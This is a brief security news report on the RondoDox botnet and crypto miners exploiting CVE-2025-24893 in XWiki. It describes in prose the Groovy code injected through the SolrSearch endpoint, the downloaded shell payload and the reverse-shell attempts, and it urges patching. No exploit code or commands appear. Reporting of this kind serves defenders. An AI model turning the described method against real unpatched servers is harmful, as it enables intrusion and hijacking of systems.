The RondoDox botnet malware is now exploiting a serious remote code execution vulnerability in the XWiki Platform, identified as CVE-2025-24893. The U.S. Cybersecurity and Information Security Agency (CISA) flagged this flaw as actively exploited on October 30. According to VulnCheck, multiple threat actors, including RondoDox operators and cryptocurrency miners, are leveraging this vulnerability in their attacks. RondoDox, first identified by Fortinet in July 2025, has rapidly expanded its reach, targeting at least 30 devices using 56 known vulnerabilities. Starting November 3, VulnCheck noted that RondoDox was exploiting CVE-2025-24893 through crafted HTTP GET requests that injected malicious Groovy code via the XWiki SolrSearch endpoint. This injection led to the server downloading a remote shell payload. The initial script, named rondo.<value>.sh, acts as a downloader for the main RondoDox payload. Further activity included cryptocurrency mining deployments and attempts to establish reverse shells on various dates, including October 31 and November 11. The vulnerability impacts versions of XWiki prior to 15.10.11 and 16.4.1, prompting immediate patching for administrators. Just days after the flaw's exploitation began, researchers observed multiple attackers leveraging it. The incidents were linked to specific user agents and documented payload servers associated with the RondoDox botnet, suggesting that known indicators of compromise could help mitigate further exploitation attempts.